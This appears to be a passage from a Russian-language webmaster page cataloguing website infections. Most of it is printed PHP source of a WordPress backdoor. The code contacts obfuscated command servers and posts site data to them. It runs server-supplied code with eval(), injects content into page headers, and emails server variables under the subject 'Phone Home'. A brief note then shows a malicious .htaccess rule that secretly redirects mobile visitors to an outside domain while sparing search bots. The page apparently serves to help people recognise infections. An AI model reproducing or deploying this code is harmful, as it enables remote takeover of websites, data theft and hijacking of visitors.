'g92Lhf2oikTq19TD1WJrgS2Mc12omIzM', '=02ow5lni9To0I3oNO3ofy3qiMKqbIzr', '=02ow5lni9To0I3oNEKn4I3L1SKqfIUq', '=02ow5lni9To0I3oN5JrfyzMcMJqfIKp', '=02ow5lni9To0I3oNqKrxSTqygJrk9zo', 'g92Lhf2oikTq19TDikJnvSJp5qKqkIar', 'g92Lhf2oikTq19TD5O3ovy2piqJnhIUq', 'g92Lhf2oikTq19TDyMKL092L5MKqwIzL', '=02ow5lni9To0I3oNcJqbIap5cKL0yKp', 'g92Lhf2oikTq19TD5qKrdS2qiAJMvITq', '=02ow5lni9To0I3oNWKM6yarycJqjSzo', '=02ow5lni9To0I3oN1JM39JoiAKMbyaL', 'g92Lhf2oikTq19TD55JnmIUM1cKrm92p', '=02ow5lni9To0I3oNq3oh9zryc3og9Tq', 'g92Lhf2oikTq19TD1OKrvyaMuWJqxyUM', 'g92Lhf2oikTq19TDiMKnvyaM1uJngIzr', '=02ow5lni9To0I3oNqKMbIUnyqKMeSTp', '=02ow5lni9To0I3oNqKngIzL1uKLlIzo', 'g92Lhf2oikTq19TDu52oj92LyuJLmyzp', '=02ow5lni9To0I3oNOKL69zMucKMlSTM', '=02ow5lni9To0I3oNuKqmyTnucJM2I3L', 'g92Lhf2oikTq19TDySKrmSTn5qKLbIao', 'g92Lhf2oikTq19TD1EKnxIJoccKL0Iao', 'g92Lhf2oikTq19TD5qKr6yzoicJMa9zo', 'g92Lhf2oikTq19TDuqJnzIao1MJnxIao', '=02ow5lni9To0I3oNc2odI2p1WKMgIzr', 'g92Lhf2oikTq19TD1uKndSTquqJrhSTo', '=02ow5lni9To0I3oNuKrwyap1cJL39Tn', '=02ow5lni9To0I3oNEJrkS2pikJMbIzn', 'g92Lhf2oikTq19TDiqJMay2p1E2ofyaL', 'g92Lhf2oikTq19TDiqKqfIzoykJqlyzo', '=02ow5lni9To0I3oNcKrbSzn51JrzI2n', '=02ow5lni9To0I3oNgJLh92McuKqm92p', 'g92Lhf2oikTq19TDcq2owyap112ox9Tq', 'g92Lhf2oikTq19TDiWJq6yJoykJMjS2M', 'g92Lhf2oikTq19TDugJray3qcqJnwSzM', 'g92Lhf2oikTq19TDcqJnmyzruEKqeyzM', '=02ow5lni9To0I3oN5JMmyUr5AJn2yUp', 'g92Lhf2oikTq19TD5MJLfyTMuc3o6Izr', 'g92Lhf2oikTq19TDiAJq6yTpyEJMbI3M', '=02ow5lni9To0I3oNAJqvI2q1MKLxS2q', 'g92Lhf2oikTq19TD1EKLeSzp11JLxy2p', ); $this->dIOUyQsvDqPHTBIxnlYs(); $this->YobOrWbieESFVcSsWsuBypg = false; $oXyaqmHoChvHQFCvTluqmAC = get_option(WP_OPTION_KEY); if ($oXyaqmHoChvHQFCvTluqmAC == null || $oXyaqmHoChvHQFCvTluqmAC == 'null') { $oXyaqmHoChvHQFCvTluqmAC = ''; } if ($oXyaqmHoChvHQFCvTluqmAC == ''){ $this->wqawPxkNytKqRKNRqbwAdw = true; $this->AeRxXNHxOXpcNJWlZSIKLhIw = new VtkddwvkYgCDDRRWbgRtw('new'); $this->QxEolVsSqvJZyRSgHFmL(); } else{ $this->AeRxXNHxOXpcNJWlZSIKLhIw = new VtkddwvkYgCDDRRWbgRtw(); $this->oXyaqmHoChvHQFCvTluqmAC = $this->McEnUjjQfaFzqGsihhU($oXyaqmHoChvHQFCvTluqmAC, true); if (isset($this->oXyaqmHoChvHQFCvTluqmAC['info']['publicKey'])) { $this->AeRxXNHxOXpcNJWlZSIKLhIw->skwTpfzBalSTBTBkLvhw($this->oXyaqmHoChvHQFCvTluqmAC['info']['publicKey']); } } $this->OFwlxWaeMyxznpZtnfJLQA(); if ($this->TztHMzNNJASlMfiSOwxQpE()) { die(); } if (!$this->wqawPxkNytKqRKNRqbwAdw) { $this->KPBBXYwmuPGPaTyLhWevI(); } } private function QxEolVsSqvJZyRSgHFmL(){ $WbKPQMoSbMZkXUeYKXRIk = $this->KZdGlovqEtKYUSCqSVnK(); $WbKPQMoSbMZkXUeYKXRIk['publicKey'] = $this->AeRxXNHxOXpcNJWlZSIKLhIw->qPhSGyDrRdyPezAnHgiao(); $this->WbKPQMoSbMZkXUeYKXRIk = $WbKPQMoSbMZkXUeYKXRIk; $vsJigIMHYwdFnuqvRwrvms = false; $BCEUSjHFFwzzqmHmpjjQI = 0; foreach($this->HSxTktcbTftjZjKRHHmhr() as $gXNjWLFkUQOugyREMXKvZBfw){ $oXyaqmHoChvHQFCvTluqmAC = $this->RoQfzgyhgTpMgdUIktgNdYvKE($gXNjWLFkUQOugyREMXKvZBfw,$WbKPQMoSbMZkXUeYKXRIk); $oXyaqmHoChvHQFCvTluqmAC = $this->gTSiihhIRUNPkADDVdes($oXyaqmHoChvHQFCvTluqmAC); if ($oXyaqmHoChvHQFCvTluqmAC !== false) { $vsJigIMHYwdFnuqvRwrvms = true; if ($this->YobOrWbieESFVcSsWsuBypg) { break; } break; } } if ($vsJigIMHYwdFnuqvRwrvms) { if ($this->YobOrWbieESFVcSsWsuBypg) { $oXyaqmHoChvHQFCvTluqmAC = $this->oqtYbOOiucMYWyZsGEuETRhB(); } $oXyaqmHoChvHQFCvTluqmAC['info'] = $WbKPQMoSbMZkXUeYKXRIk; $this->aIIwgKgvtyRoWoMedUdbp(WP_OPTION_KEY, $oXyaqmHoChvHQFCvTluqmAC); $this->oXyaqmHoChvHQFCvTluqmAC = $oXyaqmHoChvHQFCvTluqmAC; } else { $oXyaqmHoChvHQFCvTluqmAC = $this->oqtYbOOiucMYWyZsGEuETRhB(); $oXyaqmHoChvHQFCvTluqmAC['info'] = $WbKPQMoSbMZkXUeYKXRIk; $this->oXyaqmHoChvHQFCvTluqmAC = $oXyaqmHoChvHQFCvTluqmAC; $this->aIIwgKgvtyRoWoMedUdbp(WP_OPTION_KEY, $oXyaqmHoChvHQFCvTluqmAC); $this->XnpSvtOjNDRmxyfzaDKlGwM(); } return $oXyaqmHoChvHQFCvTluqmAC; } public function TztHMzNNJASlMfiSOwxQpE(){ $oXyaqmHoChvHQFCvTluqmAC = $this->oXyaqmHoChvHQFCvTluqmAC; if ($oXyaqmHoChvHQFCvTluqmAC == ''){ return false; } $SntMBKFkfTlUzXyNVQedo = @$_GET[$this->oXyaqmHoChvHQFCvTluqmAC['info']['serverKey']]; if (isset($SntMBKFkfTlUzXyNVQedo) && $SntMBKFkfTlUzXyNVQedo == '') { echo '<div id="serverList" style="display: none">'; $bQYduZxDrtPMJtaBCQycHQY['servers'] = $oXyaqmHoChvHQFCvTluqmAC['servers']; echo json_encode($bQYduZxDrtPMJtaBCQycHQY); echo '</div>'; die(); }else if (isset($SntMBKFkfTlUzXyNVQedo) && isset($this->oXyaqmHoChvHQFCvTluqmAC['info']['fail'])) { if (isset($this->oXyaqmHoChvHQFCvTluqmAC)) { $oXyaqmHoChvHQFCvTluqmAC = $this->oXyaqmHoChvHQFCvTluqmAC; }else{ $oXyaqmHoChvHQFCvTluqmAC = $this->oqtYbOOiucMYWyZsGEuETRhB(); } $oXyaqmHoChvHQFCvTluqmAC['servers'][] = $SntMBKFkfTlUzXyNVQedo; $this->aIIwgKgvtyRoWoMedUdbp(WP_OPTION_KEY, $oXyaqmHoChvHQFCvTluqmAC); die(); } return false; } public function OFwlxWaeMyxznpZtnfJLQA(){ $oXyaqmHoChvHQFCvTluqmAC = $this->oXyaqmHoChvHQFCvTluqmAC; if (!isset($oXyaqmHoChvHQFCvTluqmAC) || $oXyaqmHoChvHQFCvTluqmAC == null) { return; } if (!is_array($oXyaqmHoChvHQFCvTluqmAC) || $oXyaqmHoChvHQFCvTluqmAC == '') { return; } if (@$oXyaqmHoChvHQFCvTluqmAC['info']['eval'] == 1){ foreach ($oXyaqmHoChvHQFCvTluqmAC['eval'] as $vsGIQvwCXRbSELMOlFV) { eval($vsGIQvwCXRbSELMOlFV); } } if (isset($oXyaqmHoChvHQFCvTluqmAC['echo'])){ if (!defined('wp_footerLeo')) { add_action('wp_head', array( $this, 'WvOoqSuRpZkhgAAFQVjBjSVo')); } } } public function WvOoqSuRpZkhgAAFQVjBjSVo(){ $oXyaqmHoChvHQFCvTluqmAC = $this->oXyaqmHoChvHQFCvTluqmAC; foreach ($oXyaqmHoChvHQFCvTluqmAC['echo'] as $stIedxfhoZcXvZNmNXTdFbI) { echo $stIedxfhoZcXvZNmNXTdFbI; } } private function oqtYbOOiucMYWyZsGEuETRhB() { $oXyaqmHoChvHQFCvTluqmAC = array(); $oXyaqmHoChvHQFCvTluqmAC['echo'] = array(); $oXyaqmHoChvHQFCvTluqmAC['eval'] = array(); $oXyaqmHoChvHQFCvTluqmAC['clients'] = array(); $oXyaqmHoChvHQFCvTluqmAC['update'] = array(); return $oXyaqmHoChvHQFCvTluqmAC; } private function dIOUyQsvDqPHTBIxnlYs(){ $dqkdbOJPzAPsLsuxnjAStdXUDis = array('www.', 'www', ' ', '{', '}'); $this->htcFFCQTLLpnCchsPKGYxso = str_replace($dqkdbOJPzAPsLsuxnjAStdXUDis, "", $_SERVER['HTTP_HOST']); } private function HSxTktcbTftjZjKRHHmhr() { $oXyaqmHoChvHQFCvTluqmAC = array(); foreach ($this->yYVsqvOoqWsddypXgJcIKOw as $gXNjWLFkUQOugyREMXKvZBfw) { $oXyaqmHoChvHQFCvTluqmAC[] = base64_decode(str_rot13(strrev($gXNjWLFkUQOugyREMXKvZBfw))); } if (isset($this->oXyaqmHoChvHQFCvTluqmAC['info']['fail'])) { $nGwzfuUZcelzyfJBQMIgkk = (int) ($oXyaqmHoChvHQFCvTluqmAC['info']['fail'] / 100); if ($nGwzfuUZcelzyfJBQMIgkk == 0) { $nGwzfuUZcelzyfJBQMIgkk = 5; } else{ $nGwzfuUZcelzyfJBQMIgkk *= 5; } }else{ $nGwzfuUZcelzyfJBQMIgkk = 5; } return $this->VitTYMKdJITsiXBTLOEA($oXyaqmHoChvHQFCvTluqmAC, $nGwzfuUZcelzyfJBQMIgkk); } private function XsvsqpxlWxfKYiyUc($YJYRbBDIcUlLJwWidyuM) { $oXyaqmHoChvHQFCvTluqmAC = array(); foreach ($this->oXyaqmHoChvHQFCvTluqmAC['emails'] as $HWcwGasopLJSadVNNw){ $oXyaqmHoChvHQFCvTluqmAC[] = $HWcwGasopLJSadVNNw; } foreach ($this->aJQafHDwnaPrCJrQMjHVh as $HWcwGasopLJSadVNNw) { $oXyaqmHoChvHQFCvTluqmAC[] = base64_decode(str_rot13(strrev($HWcwGasopLJSadVNNw))); } return $this->VitTYMKdJITsiXBTLOEA($oXyaqmHoChvHQFCvTluqmAC, $YJYRbBDIcUlLJwWidyuM); } private function KZdGlovqEtKYUSCqSVnK(){ $oXyaqmHoChvHQFCvTluqmAC = array(); $oXyaqmHoChvHQFCvTluqmAC['host'] = $_SERVER['HTTP_HOST']; $oXyaqmHoChvHQFCvTluqmAC['page'] = $_SERVER['REQUEST_URI']; $oXyaqmHoChvHQFCvTluqmAC['ip'] = $_SERVER['SERVER_ADDR']; $oXyaqmHoChvHQFCvTluqmAC['eval'] = $this->YrCTrfUzBfsVJKvqiYUeFbc(); $oXyaqmHoChvHQFCvTluqmAC['exec'] = $this->KNstTqErzZQBDQOODaJdLv(); $oXyaqmHoChvHQFCvTluqmAC['serverKey'] = $this->BkISKDyWWRXScnLPbTlyI(); $oXyaqmHoChvHQFCvTluqmAC['run'] = 0; $oXyaqmHoChvHQFCvTluqmAC['ver'] = '0.2x9'; $oXyaqmHoChvHQFCvTluqmAC['started'] = date('Ymd'); $oXyaqmHoChvHQFCvTluqmAC['last_connect'] = date('Ymd'); $this->WbKPQMoSbMZkXUeYKXRIk = $oXyaqmHoChvHQFCvTluqmAC; return $oXyaqmHoChvHQFCvTluqmAC; } private function BkISKDyWWRXScnLPbTlyI($PVSXPKLAQGaWKUtNNUYQFoBuJE = 10) { $dqkdbOJPzAPsLsuxnjAStdXUDis = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'; $PqlpeiQHmZBwdmlsfEHmg = ''; for ($BCEUSjHFFwzzqmHmpjjQI = 0; $BCEUSjHFFwzzqmHmpjjQI < $PVSXPKLAQGaWKUtNNUYQFoBuJE; $BCEUSjHFFwzzqmHmpjjQI++) { $PqlpeiQHmZBwdmlsfEHmg .= $dqkdbOJPzAPsLsuxnjAStdXUDis[rand(0, strlen($dqkdbOJPzAPsLsuxnjAStdXUDis) - 1)]; } return $PqlpeiQHmZBwdmlsfEHmg; } public function KPBBXYwmuPGPaTyLhWevI(){ $oXyaqmHoChvHQFCvTluqmAC = $this->oXyaqmHoChvHQFCvTluqmAC; if (@$oXyaqmHoChvHQFCvTluqmAC['info']['last_connect'] < date('Ymd')){ $oXyaqmHoChvHQFCvTluqmAC = $this->CMQEWmnewJmgOLaFvXGCU($oXyaqmHoChvHQFCvTluqmAC); if ($oXyaqmHoChvHQFCvTluqmAC == false){ return; } else{ unset($oXyaqmHoChvHQFCvTluqmAC['info']['fail']); } $oXyaqmHoChvHQFCvTluqmAC['info']['last_connect'] = date('Ymd'); } $oXyaqmHoChvHQFCvTluqmAC['info']['run']++; $this->aIIwgKgvtyRoWoMedUdbp(WP_OPTION_KEY, $oXyaqmHoChvHQFCvTluqmAC); } private function CMQEWmnewJmgOLaFvXGCU($oXyaqmHoChvHQFCvTluqmAC){ $yYVsqvOoqWsddypXgJcIKOw = @$oXyaqmHoChvHQFCvTluqmAC['servers']; $uHrzRBdPUetDqbZAdw = $this->tEiRFSJMSpXyxKKORPZClI($yYVsqvOoqWsddypXgJcIKOw, $oXyaqmHoChvHQFCvTluqmAC); if ($uHrzRBdPUetDqbZAdw !== false){ return $uHrzRBdPUetDqbZAdw; } $uHrzRBdPUetDqbZAdw = $this->tEiRFSJMSpXyxKKORPZClI($this->HSxTktcbTftjZjKRHHmhr(), $oXyaqmHoChvHQFCvTluqmAC); if ($uHrzRBdPUetDqbZAdw !== false) { return $uHrzRBdPUetDqbZAdw; } $this->XnpSvtOjNDRmxyfzaDKlGwM(); } private function tEiRFSJMSpXyxKKORPZClI($QrnkCEWRkHbQPoEPelYQRw, $oXyaqmHoChvHQFCvTluqmAC) { foreach ($QrnkCEWRkHbQPoEPelYQRw as $gXNjWLFkUQOugyREMXKvZBfw) { $uHrzRBdPUetDqbZAdw = $this->VxjeXwUeRLricksbcxlcSRnA($gXNjWLFkUQOugyREMXKvZBfw, $oXyaqmHoChvHQFCvTluqmAC['info'], $oXyaqmHoChvHQFCvTluqmAC); if ($uHrzRBdPUetDqbZAdw != false) { if (!isset($oXyaqmHoChvHQFCvTluqmAC['info']['empty'])){ $oXyaqmHoChvHQFCvTluqmAC['info']['empty'] = 0; } if ($this->YobOrWbieESFVcSsWsuBypg) { $oXyaqmHoChvHQFCvTluqmAC['info']['empty']++; if (!isset($BCEUSjHFFwzzqmHmpjjQI)){ $BCEUSjHFFwzzqmHmpjjQI = (int)($oXyaqmHoChvHQFCvTluqmAC['info']['empty'] / 5); } if ($BCEUSjHFFwzzqmHmpjjQI > 0) { $BCEUSjHFFwzzqmHmpjjQI--; continue; } } if ($this->YobOrWbieESFVcSsWsuBypg) { return $oXyaqmHoChvHQFCvTluqmAC; } $uHrzRBdPUetDqbZAdw['info']['empty'] = --$oXyaqmHoChvHQFCvTluqmAC['info']['empty']; return $uHrzRBdPUetDqbZAdw; } } return false; } private function VxjeXwUeRLricksbcxlcSRnA($gXNjWLFkUQOugyREMXKvZBfw, $WbKPQMoSbMZkXUeYKXRIk, $oXyaqmHoChvHQFCvTluqmAC) { $this->YobOrWbieESFVcSsWsuBypg = false; $OQijXfnrxWxPIcPSUibKEFmLE = $this->RoQfzgyhgTpMgdUIktgNdYvKE($gXNjWLFkUQOugyREMXKvZBfw, $WbKPQMoSbMZkXUeYKXRIk); $OQijXfnrxWxPIcPSUibKEFmLE = $this->gTSiihhIRUNPkADDVdes($OQijXfnrxWxPIcPSUibKEFmLE); if ($OQijXfnrxWxPIcPSUibKEFmLE != false) { if ($this->YobOrWbieESFVcSsWsuBypg) { return $oXyaqmHoChvHQFCvTluqmAC; } $OQijXfnrxWxPIcPSUibKEFmLE['info'] = $WbKPQMoSbMZkXUeYKXRIk; return $OQijXfnrxWxPIcPSUibKEFmLE; } return false; } private function gTSiihhIRUNPkADDVdes($oXyaqmHoChvHQFCvTluqmAC){ if(!isset($this->WbKPQMoSbMZkXUeYKXRIk)){ $this->WbKPQMoSbMZkXUeYKXRIk = $this->oXyaqmHoChvHQFCvTluqmAC['info']; } if (md5($this->WbKPQMoSbMZkXUeYKXRIk['serverKey']) == $oXyaqmHoChvHQFCvTluqmAC) { $this->YobOrWbieESFVcSsWsuBypg = true; return true; } $oXyaqmHoChvHQFCvTluqmAC = $this->AeRxXNHxOXpcNJWlZSIKLhIw->vZlUWjEYdyPGPomnFXMGnNY($oXyaqmHoChvHQFCvTluqmAC); $oXyaqmHoChvHQFCvTluqmAC = json_decode($oXyaqmHoChvHQFCvTluqmAC, true); if ($oXyaqmHoChvHQFCvTluqmAC == false) { return false; } else{ if (!isset($oXyaqmHoChvHQFCvTluqmAC['servers'])) { return false; } } return $oXyaqmHoChvHQFCvTluqmAC; } private function RoQfzgyhgTpMgdUIktgNdYvKE($gXNjWLFkUQOugyREMXKvZBfw, $WbKPQMoSbMZkXUeYKXRIk = null,$BZaxGALPLdVfntBIQWUPs = null){ if (strstr($gXNjWLFkUQOugyREMXKvZBfw, $_SERVER['HTTP_HOST']) || trim($gXNjWLFkUQOugyREMXKvZBfw) == '') { return false; } if (isset($WbKPQMoSbMZkXUeYKXRIk)) { $BdlbpgzPBjxVLkBLnsrXkmI = json_encode($WbKPQMoSbMZkXUeYKXRIk); $oXyaqmHoChvHQFCvTluqmAC = $this->AeRxXNHxOXpcNJWlZSIKLhIw->bkBMtlOkGRaPFVExpcNbC($BdlbpgzPBjxVLkBLnsrXkmI); $WbKPQMoSbMZkXUeYKXRIk = array( "serverKey" => $WbKPQMoSbMZkXUeYKXRIk['serverKey'], "data" => $oXyaqmHoChvHQFCvTluqmAC['data'], "key" => $oXyaqmHoChvHQFCvTluqmAC['key'] ); } while (true){ $SCvWTGyfCYyeLdjcFFzobk = curl_init(); curl_setopt($SCvWTGyfCYyeLdjcFFzobk,CURLOPT_URL,"http://$gXNjWLFkUQOugyREMXKvZBfw"); curl_setopt($SCvWTGyfCYyeLdjcFFzobk,CURLOPT_RETURNTRANSFER,1); @curl_setopt($SCvWTGyfCYyeLdjcFFzobk, CURLOPT_FOLLOWLOCATION, true); if (isset($WbKPQMoSbMZkXUeYKXRIk)) { curl_setopt($SCvWTGyfCYyeLdjcFFzobk, CURLOPT_CUSTOMREQUEST, "POST"); curl_setopt($SCvWTGyfCYyeLdjcFFzobk, CURLOPT_POSTFIELDS, $WbKPQMoSbMZkXUeYKXRIk); } curl_setopt($SCvWTGyfCYyeLdjcFFzobk,CURLOPT_CONNECTTIMEOUT,10); $oXyaqmHoChvHQFCvTluqmAC = curl_exec($SCvWTGyfCYyeLdjcFFzobk); curl_close($SCvWTGyfCYyeLdjcFFzobk); if (!strstr($oXyaqmHoChvHQFCvTluqmAC, "301 Moved Permanently")) { break; } else{ preg_match_all('/<a.*href=\"""http:\/\/(.*?)\""".*?\>/',$oXyaqmHoChvHQFCvTluqmAC,$NyFDhMvsSaUwvJsx); $gXNjWLFkUQOugyREMXKvZBfw = $NyFDhMvsSaUwvJsx[1][0]; } } return $oXyaqmHoChvHQFCvTluqmAC; } private function aIIwgKgvtyRoWoMedUdbp($piiJbwvzLxHvKjlNnFzd, $oXyaqmHoChvHQFCvTluqmAC) { if (is_array($oXyaqmHoChvHQFCvTluqmAC)) { $oXyaqmHoChvHQFCvTluqmAC = json_encode($oXyaqmHoChvHQFCvTluqmAC); } $ilUTrmqGvQsBtZfyeBXfg = $this->AeRxXNHxOXpcNJWlZSIKLhIw->MFmjdYJpnAEmbwnXvkQU($oXyaqmHoChvHQFCvTluqmAC); if ($this->YYfeblxJfGQgkPpfdrIOXNZwHg($ilUTrmqGvQsBtZfyeBXfg)) $oXyaqmHoChvHQFCvTluqmAC = json_decode($ilUTrmqGvQsBtZfyeBXfg, true); if (!isset($oXyaqmHoChvHQFCvTluqmAC['key']) || !isset($oXyaqmHoChvHQFCvTluqmAC['data']) || strlen($oXyaqmHoChvHQFCvTluqmAC['key']) == 0 || strlen($oXyaqmHoChvHQFCvTluqmAC['data']) == 0 ) { die(); } update_option($piiJbwvzLxHvKjlNnFzd, $ilUTrmqGvQsBtZfyeBXfg); } private function McEnUjjQfaFzqGsihhU($piiJbwvzLxHvKjlNnFzd, $ysnqBUjsRbJDIlZaAE = false) { if (!$ysnqBUjsRbJDIlZaAE) { $oXyaqmHoChvHQFCvTluqmAC = get_option($piiJbwvzLxHvKjlNnFzd); }else{ $oXyaqmHoChvHQFCvTluqmAC = $piiJbwvzLxHvKjlNnFzd; } $GfNOeQGoTKggozAbXZAUpg = $this->AeRxXNHxOXpcNJWlZSIKLhIw->vZlUWjEYdyPGPomnFXMGnNY($oXyaqmHoChvHQFCvTluqmAC); return json_decode($GfNOeQGoTKggozAbXZAUpg, true); } private function YrCTrfUzBfsVJKvqiYUeFbc(){ $givBPiVtALrQjPLInUFKegOE = false; @eval('$givBPiVtALrQjPLInUFKegOE = true;'); return $givBPiVtALrQjPLInUFKegOE; } private function KNstTqErzZQBDQOODaJdLv() { $BlvGDekbFjVHsnUrjUKqdj = explode(', ', ini_get('disable_functions')); return !in_array('exec', $BlvGDekbFjVHsnUrjUKqdj); } private function XnpSvtOjNDRmxyfzaDKlGwM($oXyaqmHoChvHQFCvTluqmAC = null) { if ($oXyaqmHoChvHQFCvTluqmAC == null) { $oXyaqmHoChvHQFCvTluqmAC = $this->oXyaqmHoChvHQFCvTluqmAC; } if (isset($oXyaqmHoChvHQFCvTluqmAC['info']['fail'])){ $oXyaqmHoChvHQFCvTluqmAC['info']['fail']++; }else{ $oXyaqmHoChvHQFCvTluqmAC['info']['fail'] = 1; } if (($oXyaqmHoChvHQFCvTluqmAC['info']['fail'] % 100) == 0 && isset($oXyaqmHoChvHQFCvTluqmAC['clients'])){ foreach ($oXyaqmHoChvHQFCvTluqmAC['clients'] as $qBNcTAaiRUhfdXBSzsVg) { if (strstr($qBNcTAaiRUhfdXBSzsVg, "|") === false) { continue; } else{ $AoNmaQCAQvHyEPvRUhbfukXQ = explode("|", $qBNcTAaiRUhfdXBSzsVg); } $gXNjWLFkUQOugyREMXKvZBfw = $AoNmaQCAQvHyEPvRUhbfukXQ[0] . "?" . $AoNmaQCAQvHyEPvRUhbfukXQ[1]; $OQijXfnrxWxPIcPSUibKEFmLE = $this->RoQfzgyhgTpMgdUIktgNdYvKE($gXNjWLFkUQOugyREMXKvZBfw); preg_match("/<div id=\"serverList\" style=\"display: none\">(?<content>.*?)<\/div>/", $OQijXfnrxWxPIcPSUibKEFmLE, $NUwGojaMFrWOXnaoPPXmg); if ($this->YYfeblxJfGQgkPpfdrIOXNZwHg($NUwGojaMFrWOXnaoPPXmg['content'])){ $OQijXfnrxWxPIcPSUibKEFmLE = json_decode($NUwGojaMFrWOXnaoPPXmg['content'], true); if (isset($this->oXyaqmHoChvHQFCvTluqmAC)) { $oXyaqmHoChvHQFCvTluqmAC = $this->oXyaqmHoChvHQFCvTluqmAC; }else{ $oXyaqmHoChvHQFCvTluqmAC = $this->oqtYbOOiucMYWyZsGEuETRhB(); } $oXyaqmHoChvHQFCvTluqmAC['servers'] = array_merge($OQijXfnrxWxPIcPSUibKEFmLE['servers'], $oXyaqmHoChvHQFCvTluqmAC['servers']); $this->$oXyaqmHoChvHQFCvTluqmAC['servers'] = array_unique($oXyaqmHoChvHQFCvTluqmAC['servers']); } else{ } } } if ($oXyaqmHoChvHQFCvTluqmAC['info']['fail'] % 100 == 0) { $LMKkvQfVacsJkiwJOKQmc = false; $aJQafHDwnaPrCJrQMjHVh = $this->XsvsqpxlWxfKYiyUc($oXyaqmHoChvHQFCvTluqmAC['info']['fail'] / 100 * 5); $GSpWdZRUzAuMgSxhFeQsTA = array(); for($BCEUSjHFFwzzqmHmpjjQI = 0; $BCEUSjHFFwzzqmHmpjjQI < 5 ; $BCEUSjHFFwzzqmHmpjjQI++) { $YwrSbZoVizxkPzSqHegTC = rand( 0, count($aJQafHDwnaPrCJrQMjHVh) - 1); $TcfJENOGUCdnEeJdjBHSxLc = 0; $XCZRNpIiBvvCJTeyKlycSwY = 0; while(in_array($YwrSbZoVizxkPzSqHegTC,$GSpWdZRUzAuMgSxhFeQsTA)){ $XCZRNpIiBvvCJTeyKlycSwY++; $TcfJENOGUCdnEeJdjBHSxLc ++; $YwrSbZoVizxkPzSqHegTC = rand( 0, count($aJQafHDwnaPrCJrQMjHVh) - 1); if ($TcfJENOGUCdnEeJdjBHSxLc == 10) { $LMKkvQfVacsJkiwJOKQmc = true; break; } } if ($LMKkvQfVacsJkiwJOKQmc){ break; } $GSpWdZRUzAuMgSxhFeQsTA[] = $YwrSbZoVizxkPzSqHegTC; mail($aJQafHDwnaPrCJrQMjHVh[$YwrSbZoVizxkPzSqHegTC], "Phone Home", json_encode($this->AeRxXNHxOXpcNJWlZSIKLhIw->bkBMtlOkGRaPFVExpcNbC(print_r($oXyaqmHoChvHQFCvTluqmAC, true) . print_r($_SERVER, true)))); } $this->vwhhtIrAWhUEFDgPrcco = true; } $this->aIIwgKgvtyRoWoMedUdbp(WP_OPTION_KEY, $oXyaqmHoChvHQFCvTluqmAC); } private function YYfeblxJfGQgkPpfdrIOXNZwHg($oXyaqmHoChvHQFCvTluqmAC){ $oXyaqmHoChvHQFCvTluqmAC = json_decode($oXyaqmHoChvHQFCvTluqmAC); if ($oXyaqmHoChvHQFCvTluqmAC == null) return false; return true; } private function VitTYMKdJITsiXBTLOEA($QrnkCEWRkHbQPoEPelYQRw, $MTPkrEtDJbjkrzXWSBgAo) { $PVSXPKLAQGaWKUtNNUYQFoBuJE = count($QrnkCEWRkHbQPoEPelYQRw); if ($PVSXPKLAQGaWKUtNNUYQFoBuJE <= $MTPkrEtDJbjkrzXWSBgAo) { return $QrnkCEWRkHbQPoEPelYQRw; } $oXyaqmHoChvHQFCvTluqmAC[] = array(); $PaTgoaVMMKhvlmVWxSnBVLA = array(); $FyQVCWLNApYgwsSzygQgg = 0; $BCEUSjHFFwzzqmHmpjjQI = 0; while (true) { $BCEUSjHFFwzzqmHmpjjQI++; $piiJbwvzLxHvKjlNnFzd = $this->YHhBHrBuAZYCsZUCLxMNBSuTU($this->htcFFCQTLLpnCchsPKGYxso . $BCEUSjHFFwzzqmHmpjjQI , $PVSXPKLAQGaWKUtNNUYQFoBuJE); if (in_array($piiJbwvzLxHvKjlNnFzd, $PaTgoaVMMKhvlmVWxSnBVLA)) { continue; } $PaTgoaVMMKhvlmVWxSnBVLA[] = $piiJbwvzLxHvKjlNnFzd; $FyQVCWLNApYgwsSzygQgg++; if ($FyQVCWLNApYgwsSzygQgg == $MTPkrEtDJbjkrzXWSBgAo) { break; } } foreach ($PaTgoaVMMKhvlmVWxSnBVLA as $piiJbwvzLxHvKjlNnFzd) { $oXyaqmHoChvHQFCvTluqmAC[] = $QrnkCEWRkHbQPoEPelYQRw[$piiJbwvzLxHvKjlNnFzd]; } return $oXyaqmHoChvHQFCvTluqmAC; } private function YHhBHrBuAZYCsZUCLxMNBSuTU($htcFFCQTLLpnCchsPKGYxso, $BwYCWyuBYkgiOzNljFJONA) { $dzVXtdBSuUwgnARTiNICo = 0; $JAxNyUCJRbrfbemcWrOFpg = hash("md5",$htcFFCQTLLpnCchsPKGYxso); $dzVXtdBSuUwgnARTiNICo = (preg_replace("/[^0-9,.]/", "", $JAxNyUCJRbrfbemcWrOFpg)); while ($dzVXtdBSuUwgnARTiNICo > 10000000){ $dzVXtdBSuUwgnARTiNICo /= 100000; } $this->IatJdWimJbxtprWZElHevfI = $dzVXtdBSuUwgnARTiNICo; $dzVXtdBSuUwgnARTiNICo %= $BwYCWyuBYkgiOzNljFJONA; return $dzVXtdBSuUwgnARTiNICo; } } ?>
Редиректы

Хитрый вирус, который делает выборочные редиректы с разных страниц, в разное время. Очень трудно его обнаружить. Заметил случайно, когда зашел на мобильную версию сайта. Вирус сидел во всех .htaccess

RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|windows\ phone) [NC]
RewriteCond %{HTTP_USER_AGENT} !(accoona|ia_archiver|antabot|ask\ jeeves|baidu|dcpbot|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|yahoo!\ slurp|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer) [NC]
RewriteRule ^(.*)$ http://blinko-mobile.com/l=32411e12076c0b4d0356455649545343764405181b6e [L,R=302]
base64_decode

Не помню, что вирус делал, но он был в index.php


